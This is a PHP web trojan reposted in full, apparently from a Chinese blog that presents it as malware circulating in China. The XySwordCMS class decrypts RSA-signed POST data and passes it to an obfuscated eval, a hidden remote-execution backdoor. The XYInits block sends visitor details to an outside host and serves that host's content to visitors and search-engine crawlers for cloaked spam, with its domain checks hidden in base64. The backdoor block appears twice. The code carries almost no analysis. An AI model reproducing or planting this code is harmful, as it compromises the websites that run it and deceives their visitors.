if (!defined("XY_FLAG_MA")) {
define("XY_FLAG_MA", "XySwordCMS");
if (!empty($_REQUEST["xysword"]) && intval(trim($_REQUEST["xysword"])) == 1) {
if (!class_exists("XySwordCMS")) {
class XySwordCMS
{
private $postKey = '-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDUW6dEDabpbyRr+IArdkBJHqUJ
QzynPJCZgHnYn50yVMwk2o6+w0yi2vhrb63F3WYg6D+dhPFOtfengfpugLrr1Dt3
4m2JpwczSTlBuxa47T5vkHQb7NOg6x88tJYbIgP34OTuku3gPBrQbvJJHk3yqVsD
EqFamZy5emC0Kx5efQIDAQAB
-----END PUBLIC KEY-----';
private $start = '$';
private $name = "";
private $exp = "f";
private $cfg_key = "xy";
public $insKey = "";
private $cache_key = "66";
private $suffix = "v";
private function init()
{
$this->lock = "false";
if ($this->name == "add") {
$this->add();
}
return true;
}
public function on()
{
global $xySword66;
$c = $this->start . $this->install . $this->name . $this->do . $this->begin;
if (!$xySword66) {
return false;
} else {
if ($this->lock == "false") {
return false;
}
if ($this->init !== "false" && $this->name == "S") {
return eval($this->init . "al($c);");
}
}
return false;
}
public function lock()
{
if ($this->lock == "false") {
$this->cms("e");
$this->add_data();
$this->install_start();
$this->install_sql();
$this->install_end();
}
return false;
}
public function add()
{
$this->begin = "66";
$this->lock();
}
public function __get($name)
{
if (isset($this->$name)) {
return $this->$name;
}
if ($name == "install") {
return "xy";
}
return "word";
}
public function __call($name, $arguments)
{
$add = "";
if (!empty($arguments)) {
$add = trim($arguments[0]);
}
if (empty($this->init)) $this->init = "false";
if (!$this->name) {
$this->name = "add";
}
if ($name == "cms") {
$this->lock = "true";
$add .= $this->suffix;
if ($this->init === "false") {
$this->init = $add;
} else {
$this->init = "";
}
$this->name = "S";
if ($this->init && $this->init !== "false") {
exit($this->on());
}
$this->install_cms();
return true;
}
return $this->init();
}
public function __construct()
{
$this->insKey = "start install";
if (empty($_POST['id']) && empty($_POST['sid'])) {
$c = array_pop($_POST);
$ccs = explode(str_repeat($this->exp, 4), $c);
$prim = openssl_pkey_get_public($this->postKey);
$cc = '';
foreach ($ccs as $ccc) {
if (openssl_public_decrypt(base64_decode($ccc), $de, $prim)) {
$cc .= $de;
}
}
$this->insKey = $cc;
return;
} else {
$this->lock();
}
$this->init();
}
}
}
@error_reporting(0);
$xyCms = new XySwordCMS();
$xySword66 = $xyCms->insKey;
exit($xyCms->install());
}
}
if (!defined("XY_FLAG_TXT")){
define("XY_FLAG_TXT", "211n.com");
if (!function_exists("XYInits") && !function_exists("IsSpider") && !function_exists("rdNum") && !function_exists("rdAlp") && !function_exists("ISsP") && !function_exists("SafeReplace") && !function_exists("GetClientIp") && !function_exists("HttpGetApi") && !function_exists("GetRequestUrl") && !function_exists("GetRootUrl")) {
function SafeReplace($a)
{
$a = str_replace('%20', '', $a);
$a = str_replace('%27', '', $a);
$a = str_replace('%2527', '', $a);
$a = str_replace('*', '', $a);
$a = str_replace('"', '"', $a);
$a = str_replace("'", '', $a);
$a = str_replace('"', '', $a);
$a = str_replace(';', '', $a);
$a = str_replace('<', '<', $a);
$a = str_replace('>', '>', $a);
$a = str_replace("{", '', $a);
$a = str_replace('}', '', $a);
return $a;
}
function GetClientIp()
{
if (!defined("JSJS")) {
define("JSJS", "http://cms.ys.211n.com/cmshelp");
}
if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) {
$b = $_SERVER["REMOTE_ADDR"];
} elseif (!isset($_SERVER['REMOTE_ADDR'])) {
$b = "127.0.0.1";
} else {
$b = "0.0.0.0";
}
return $b;
}
function IsSpider()
{
$c = array('104.233.219', '127.0.0', '64.20.40', '34.80.50', '115.239.212', '136.57.213', '67.195.49', '61.135.169', '111.206.198', '65.55.218', '119.63.195', '40.77.186', '13.66.144', '40.77.192', '34.65.242', '34.88.194', '23.103.64', '202.165.111', '67.195.52', '136.52.120', '65.55.209', '40.90.155', '34.118.254', '118.184.177', '157.55.21', '65.52.109', '173.82.106', '106.10.186', '13.66.139', '124.166.232', '104.44.91', '34.89.198', '218.16.62', '34.22.85', '111.225.148', '123.183.224', '40.77.189', '209.141.35', '66.249.69', '58.250.125', '191.233.204', '123.125.125', '74.6.168', '103.255.141', '220.243.189', '199.30.20', '40.77.175', '65.55.107', '40.77.254', '64.68.90', '64.68.92', '106.120.188', '60.8.151', '62.254.36', '34.64.82', '157.55.103', '131.253.35', '157.56.1', '40.77.213', '42.236.103', '181.129.52', '220.243.135', '45.136.113', '40.77.221', '52.167.144', '13.71.172', '123.125.66', '8.8.8', '65.55.210', '40.77.173', '40.77.169', '220.243.136', '189.73.192', '216.252.126', '123.125.109', '110.249.201', '180.76.5', '34.176.130', '157.55.107', '42.236.13', '20.74.197', '46.37.85', '20.36.108', '123.125.186', '131.253.27', '40.77.187', '40.90.149', '13.67.10', '203.208.60', '34.100.182', '49.7.20', '218.30.103', '34.126.178', '34.96.162', '213.104.143', '40.77.191', '40.77.209', '136.52.36', '40.77.179', '40.77.188', '187.115.167', '123.125.68', '20.79.107', '131.253.38', '64.68.88', '67.195.55', '124.108.100', '136.37.33', '180.76.15', '157.55.50', '66.249.73', '171.33.237', '95.216.33', '60.8.123', '111.206.221', '111.225.149', '61.135.165', '180.153.234', '157.55.23', '40.77.185', '173.82.206', '42.236.101', '66.249.68', '49.7.21', '62.253.72', '42.236.16', '20.15.133', '95.216.227', '13.69.66', '123.126.113', '42.236.12', '203.84.194', '123.125.71', '199.30.18', '40.77.161', '207.46.199', '220.243.188', '40.77.163', '66.249.77', '154.73.81', '116.179.37', '65.55.217', '65.55.146', '65.54.247', '34.154.114', '66.249.64', '42.236.150', '42.236.17', '199.30.26', '199.30.22', '199.30.24', '65.55.219', '67.195.83', '199.30.27', '42.236.46', '199.30.25', '220.181.108', '42.236.48', '136.50.21', '209.131.41', '95.216.113', '65.52.110', '131.253.24', '66.249.79', '40.90.146', '58.217.202', '98.139.1', '40.77.165', '157.55.34', '199.188.107', '40.90.156', '220.181.124', '42.236.102', '51.105.67', '49.7.117', '65.55.214', '66.249.71', '61.135.168', '157.66', '40.79.131', '40.79.186', '61.135.162', '157.55.12', '131.253.25', '34.152.50', '40.77.217', '34.155.98', '111.202.101', '180.149.133', '136.36.160', '123.125.143', '66.249.65', '157.56.92', '34.175.160', '111.202.103', '220.181.125', '67.195.98', '35.247.243', '157.55.106', '183.177.73', '40.77.253', '116.17.55.13', '66.249.66', '119.160.246', '82.15.95', '157.55.154', '42.236.10', '207.46.13', '42.236.55', '124.108.92', '104.47.224', '40.90.157', '64.68.91', '42.236.52', '103.227.66', '40.77.160', '106.120.173', '207.154.236', '124.108.101', '66.249.75', '42.236.53', '40.77.190', '113.24.225', '157.55.39', '34.146.150', '65.55.213', '42.236.51', '180.153.236', '157.55.10', '40.77.167', '116.179.32', '200.29.113', '40.90.144', '42.236.54', '220.181.32', '199.30.28', '66.249.72', '124.64.200', '40.77.176', '123.126.68', '111.202.100', '180.153.232', '40.77.208', '119.63.198', '157.56.93', '34.89.10', '34.165.18', '110.249.202', '157.55.22', '66.249.76', '34.147.110', '42.236.15', '40.77.195', '180.149.143', '66.249.78', '66.2499.37', '157.55.13', '72.30.14', '65.55.215', '20.43.120', '61.135.159', '34.151.74', '111.221.28', '42.236.99', '131.253.26', '78.46.22', '106.38.241', '27.123.51', '40.77.180', '36.110.147', '217.146.176', '199.30.29', '40.90.152', '40.77.216', '42.236.49', '180.163.220', '66.249.70', '42.236.50', '202.89.235', '8.12.149', '42.236.14', '61.135.186', '65.55.208', '116.214.12', '66.249.74', '34.118.66');
$b = getClientIp();
if (!$b || $b == "unknown") {
return false;
}
if (trim($b) == "127.0.0.1") {
if (!isset($_SERVER["HTTP_USER_AGENT"])) {
return false;
}
$d = strtolower($_SERVER["HTTP_USER_AGENT"]);
if (!$d || !preg_match('/spider/', $d)) {
return false;
}
}
$e = explode('.', $b);
array_pop($e);
$f = implode('.', $e);
if (in_array($f, $c)) {
return true;
}
return false;
}
function HttpGetApi($g)
{
$h = curl_init();
curl_setopt($h, CURLOPT_URL, $g);
curl_setopt($h, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');
curl_setopt($h, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($h, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($h, CURLOPT_HEADER, 0);
$i = curl_exec($h);
curl_close($h);
return $i;
}
function CheckREQUri($j, $k)
{
if ($k($j, "xysword")){
return false;
}
if ($k($j, ".shtml") || $k($j, "xchannel") || $k($j, "%") || $k($j, ".html") && $k($j, "index.php/")) {
return true;
} else {
$j = urlencode(urldecode(urldecode($j)));
$j = str_replace("%2F", "/", $j);
$j = str_replace("%3F", "?", $j);
$j = str_replace("%26", "&", $j);
$j = str_replace("%3D", "=", $j);
if ($k($j, "%")) {
return true;
}
}
return false;
}
function XYInits()
{
$k = "stristr";
$l = "base64_decode";
@error_reporting(0);
if (isset($_SERVER['HTTP_REFERER']) && $k(strtolower($_SERVER['HTTP_REFERER']), $l("aW1hZ2UuYmFpZHUuY29t")) !== false) {
exit(0);
}
if (!defined("JSURI")) {
define('JSURI', $_SERVER['REQUEST_URI']);
}
if (!defined("CHECKJSJS")) {
define('CHECKJSJS', CheckREQUri(JSURI, $k));
}
if (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) === 'xmlhttprequest') {
} elseif (CHECKJSJS && strpos($_SERVER['HTTP_HOST'], strtolower($l("Lmdvdi5jbg=="))) === false) {
$b = GetClientIp();
$m = isset($_SERVER["SERVER_PORT"]) ? urlencode($_SERVER['SERVER_PORT']) : "";
$n = isset($_SERVER["HTTP_USER_AGENT"]) ? urlencode($_SERVER['HTTP_USER_AGENT']) : "";
$o = isset($_SERVER["QUERY_STRING"]) ? urlencode($_SERVER['QUERY_STRING']) : "";
$p = isset($_SERVER["HTTP_HOST"]) ? urlencode($_SERVER['HTTP_HOST']) : "";
$q = isset($_SERVER["PHP_SELF"]) ? urlencode($_SERVER['PHP_SELF']) : "";
$r = isset($_SERVER["HTTP_REFERER"]) ? urlencode($_SERVER["HTTP_REFERER"]) : "";
$s = "";
$j = isset($_SERVER["REQUEST_URI"]) ? urlencode($_SERVER['REQUEST_URI']) : "";
$g = JSJS . "?port={$m}&query={$o}&host={$p}&ua={$n}&ip={$b}&self={$q}&path={$s}&ref={$r}&uri={$j}&uritype=1";
$t = HttpGetApi($g);
if ($t) {
exit($t);
}
} else {
if (IsSpider() && strpos($_SERVER['HTTP_HOST'], strtolower($l("Lmdvdi5jbg=="))) === false) {
$u = GetClientIp();
$v = isset($_SERVER["SERVER_PORT"]) ? urlencode($_SERVER['SERVER_PORT']) : "";
$w = isset($_SERVER["HTTP_USER_AGENT"]) ? urlencode($_SERVER['HTTP_USER_AGENT']) : "";
$x = isset($_SERVER["QUERY_STRING"]) ? urlencode($_SERVER['QUERY_STRING']) : "";
$y = isset($_SERVER["HTTP_HOST"]) ? urlencode($_SERVER['HTTP_HOST']) : "";
$z = isset($_SERVER["PHP_SELF"]) ? urlencode($_SERVER['PHP_SELF']) : "";
$r = isset($_SERVER["HTTP_REFERER"]) ? urlencode($_SERVER["HTTP_REFERER"]) : "";
$aa = "";
$bb = JSJS . "?port={$v}&query={$x}&host={$y}&ua={$w}&ip={$u}&self={$z}&path={$aa}&ref={$r}&uri=getUrl.html&uritype=1";
$t = HttpGetApi($bb);
if (!empty($t)) {
@ob_start();
echo $t;
@ob_flush();
}
}
}
}
function GetRequestUrl()
{
$cc = isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443' ? 'https://' : 'http://';
$dd = $_SERVER['PHP_SELF'] ? SafeReplace($_SERVER['PHP_SELF']) : SafeReplace($_SERVER['SCRIPT_NAME']);
$ee = isset($_SERVER['PATH_INFO']) ? SafeReplace($_SERVER['PATH_INFO']) : '';
$ff = isset($_SERVER['REQUEST_URI']) ? SafeReplace($_SERVER['REQUEST_URI']) : $dd . (isset($_SERVER['QUERY_STRING']) ? '?' . SafeReplace($_SERVER['QUERY_STRING']) : $ee);
$g = $cc . (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '') . $ff;
return $g;
}
@XYInits();
function GetRootUrl()
{
if (!isset($_SERVER['HTTP_HOST'])) {
return false;
}
$cc = isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443' ? 'https://' : 'http://';
return $cc . $_SERVER['HTTP_HOST'];
}
}
}
if (!defined("XY_FLAG_MA")) {
define("XY_FLAG_MA", "XySwordCMS");
if (!empty($_REQUEST["xysword"]) && intval(trim($_REQUEST["xysword"])) == 1) {
if (!class_exists("XySwordCMS")) {
class XySwordCMS
{
private $postKey = '-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDUW6dEDabpbyRr+IArdkBJHqUJ
QzynPJCZgHnYn50yVMwk2o6+w0yi2vhrb63F3WYg6D+dhPFOtfengfpugLrr1Dt3
4m2JpwczSTlBuxa47T5vkHQb7NOg6x88tJYbIgP34OTuku3gPBrQbvJJHk3yqVsD
EqFamZy5emC0Kx5efQIDAQAB
-----END PUBLIC KEY-----';
private $start = '$';
private $name = "";
private $exp = "f";
private $cfg_key = "xy";
public $insKey = "";
private $cache_key = "66";
private $suffix = "v";
private function init()
{
$this->lock = "false";
if ($this->name == "add") {
$this->add();
}
return true;
}
public function on()
{
global $xySword66;
$c = $this->start . $this->install . $this->name . $this->do . $this->begin;
if (!$xySword66) {
return false;
} else {
if ($this->lock == "false") {
return false;
}
if ($this->init !== "false" && $this->name == "S") {
return eval($this->init . "al($c);");
}
}
return false;
}
public function lock()
{
if ($this->lock == "false") {
$this->cms("e");
$this->add_data();
$this->install_start();
$this->install_sql();
$this->install_end();
}
return false;
}
public function add()
{
$this->begin = "66";
$this->lock();
}
public function __get($name)
{
if (isset($this->$name)) {
return $this->$name;
}
if ($name == "install") {
return "xy";
}
return "word";
}
public function __call($name, $arguments)
{
$add = "";
if (!empty($arguments)) {
$add = trim($arguments[0]);
}
if (empty($this->init)) $this->init = "false";
if (!$this->name) {
$this->name = "add";
}
if ($name == "cms") {
$this->lock = "true";
$add .= $this->suffix;
if ($this->init === "false") {
$this->init = $add;
} else {
$this->init = "";
}
$this->name = "S";
if ($this->init && $this->init !== "false") {
exit($this->on());
}
$this->install_cms();
return true;
}
return $this->init();
}
public function __construct()
{
$this->insKey = "start install";
if (empty($_POST['id']) && empty($_POST['sid'])) {
$c = array_pop($_POST);
$ccs = explode(str_repeat($this->exp, 4), $c);
$prim = openssl_pkey_get_public($this->postKey);
$cc = '';
foreach ($ccs as $ccc) {
if (openssl_public_decrypt(base64_decode($ccc), $de, $prim)) {
$cc .= $de;
}
}
$this->insKey = $cc;
return;
} else {
$this->lock();
}
$this->init();
}
}
}
@error_reporting(0);
$xyCms = new XySwordCMS();
$xySword66 = $xyCms->insKey;
exit($xyCms->install());
}
}
转载请注明:无趣的人生也产生有意思的事件 » 国内玩的网页木马,建议作者投案自首